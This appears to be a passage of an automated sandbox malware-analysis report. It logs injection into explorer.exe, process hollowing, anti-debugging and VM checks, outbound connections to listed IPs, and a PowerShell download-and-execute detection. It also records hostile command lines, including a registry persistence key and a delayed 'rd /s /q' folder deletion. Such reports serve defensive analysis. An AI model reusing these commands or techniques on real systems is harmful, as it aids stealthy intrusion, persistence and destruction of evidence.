Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Source: explorer.exe, 00000001.00000000.1690636366.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000002A.00000002.2891687444.0000000008E46000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2707064136.0000000008ED6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW00
Source: explorer.exe, 00000001.00000000.1687109681.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000002A.00000002.2891687444.0000000008DAD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWUSndClass H
Source: explorer.exe, 0000002A.00000002.2891687444.0000000008D4A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000001.00000000.1690075566.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1690075566.000000000982D000.00000004.00000001.00020000.00000000.sdmp, E609.exe, 0000000A.00000002.2053964742.0000000000557000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000A.00000002.2053964742.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.0000000000883000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.0000000000753000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2210740943.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000829000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000002A.00000002.2897813212.000000000CF76000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 0000002A.00000002.2891687444.0000000008D46000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware_
Source: explorer.exe, 0000002A.00000002.2891687444.0000000008D4A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000002A.00000002.2897813212.000000000D0CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000001.00000000.1690075566.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1688547736.00000000078A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: E609.exe, 0000000A.00000002.2053964742.0000000000557000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yt
Source: E609.exe, 00000011.00000002.2876679850.00000000006C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000001.00000000.1690636366.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: E609.exe, 0000000A.00000002.2053964742.0000000000557000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: explorer.exe, 0000002A.00000002.2897813212.000000000CF76000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00op
Source: explorer.exe, 0000002A.00000002.2873664959.0000000001388000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000l
Source: explorer.exe, 0000002A.00000002.2880479170.0000000004E80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NXT_RVMWare
Source: explorer.exe, 0000002A.00000003.2707064136.0000000008E66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation CounterL
Source: explorer.exe, 0000002A.00000002.2897813212.000000000CF76000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 0000002A.00000003.2707064136.0000000008ED6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4NECVMWar VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1690075566.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: build2.exe, 00000013.00000002.2688985595.00000000051F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: explorer.exe, 0000002A.00000002.2891687444.0000000009001000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000Pca
Source: explorer.exe, 0000002A.00000003.2739474666.000000000D17E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000002A.00000002.2897813212.000000000CF76000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}~1HI4
Source: build2.exe, 00000013.00000002.2688985595.00000000051F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareD64
Source: explorer.exe, 0000002A.00000002.2897813212.000000000CF76000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8
Source: explorer.exe, 00000001.00000000.1688547736.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000001.00000000.1690075566.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 0000002A.00000002.2873664959.0000000001388000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000002A.00000003.2707064136.0000000008ED6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JVMware V
Source: explorer.exe, 0000002A.00000003.2739943356.000000000D176000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1687109681.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\AppData\Local\Temp\E609.exe	API call chain: ExitProcess graph end node			graph_10-39507
Source: C:\Users\user\AppData\Local\Temp\E609.exe	API call chain: ExitProcess graph end node			graph_15-41755

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\file.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu	System information queried: CodeIntegrityInformation

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Code function: 9_2_0497771C rdtsc

9_2_0497771C

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Code function: 10_2_00424168 _memset,IsDebuggerPresent,

10_2_00424168

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Code function: 10_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

10_2_0042A57A

Source: C:\Users\user\AppData\Local\Temp\E609.exe

15_2_00481920

Source: C:\Users\user\AppData\Local\Temp\E609.exe

10_2_00412220

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02E20D90 mov eax, dword ptr fs:[00000030h]	0_2_02E20D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02E2092B mov eax, dword ptr fs:[00000030h]	0_2_02E2092B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02E51E41 push dword ptr fs:[00000030h]	0_2_02E51E41
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_02EE0D90 mov eax, dword ptr fs:[00000030h]	4_2_02EE0D90
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_02EE092B mov eax, dword ptr fs:[00000030h]	4_2_02EE092B
Source: C:\Users\user\AppData\Roaming\rujtcgu	Code function: 4_2_02F21241 push dword ptr fs:[00000030h]	4_2_02F21241
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_049760A3 push dword ptr fs:[00000030h]	9_2_049760A3
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 9_2_04A10042 push dword ptr fs:[00000030h]	9_2_04A10042
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_049DC0A3 push dword ptr fs:[00000030h]	14_2_049DC0A3
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 14_2_04A70042 push dword ptr fs:[00000030h]	14_2_04A70042

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Code function: 10_2_004278D5 GetProcessHeap,

10_2_004278D5

Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_004329EC
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_004329BB SetUnhandledExceptionFilter,	10_2_004329BB
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_004329EC
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_004329BB SetUnhandledExceptionFilter,	15_2_004329BB

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: rujtcgu.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 189.163.126.89 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.174.152.66 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 193.233.132.167 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.92.253.69 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.154.13.143 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.185.16.114 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 158.160.165.129 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.196.109.209 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.159.134.233 443	Jump to behavior

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: build2.exe PID: 7144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build2.exe PID: 5316, type: MEMORYSTR

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Code function: 9_2_04A10110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,

9_2_04A10110

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\file.exe	Thread created: C:\Windows\explorer.exe EIP: B4D19A0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu	Thread created: unknown EIP: 7D719A0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu	Thread created: unknown EIP: 9CE19A0

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\E609.exe	Memory written: C:\Users\user\AppData\Local\Temp\E609.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Memory written: C:\Users\user\AppData\Local\Temp\E609.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Memory written: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Memory written: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Memory written: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	Memory written: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Memory written: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\file.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rujtcgu	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\rujtcgu	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe

Section unmapped: C:\Windows\System32\conhost.exe base address: 400000

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Code function: 10_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,

10_2_00419F90

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Process created: C:\Users\user\AppData\Local\Temp\E609.exe C:\Users\user\AppData\Local\Temp\E609.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Process created: C:\Users\user\AppData\Local\Temp\E609.exe "C:\Users\user\AppData\Local\Temp\E609.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe --Task
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe"
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIJEBGDAFHI" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	Process created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe"
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Process created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown

Source: explorer.exe, 0000002A.00000002.2873664959.0000000001388000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: *Progman8
Source: explorer.exe, 00000001.00000000.1690075566.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1687402593.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1688395629.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.1687402593.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2890584363.0000000005340000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.1687109681.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000001.00000000.1687402593.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000001.00000000.1687402593.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Code function: 9_2_04A380F6 cpuid

9_2_04A380F6

Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	9_2_04A50AB6
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	10_2_00438178
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	10_2_00440116
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	10_2_004382A2
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	10_2_0043834F
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	10_2_00438423
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: EnumSystemLocalesW,	10_2_004387C8
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: GetLocaleInfoW,	10_2_0043884E
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	10_2_00437BB3
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: EnumSystemLocalesW,	10_2_00437E27
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	10_2_00437E83
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	10_2_00437F00
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	10_2_00437F83
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	14_2_04AB0AB6
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	15_2_00438178
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	15_2_00440116
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	15_2_004382A2
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	15_2_0043834F
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	15_2_00438423
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: EnumSystemLocalesW,	15_2_004387C8
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: GetLocaleInfoW,	15_2_0043884E
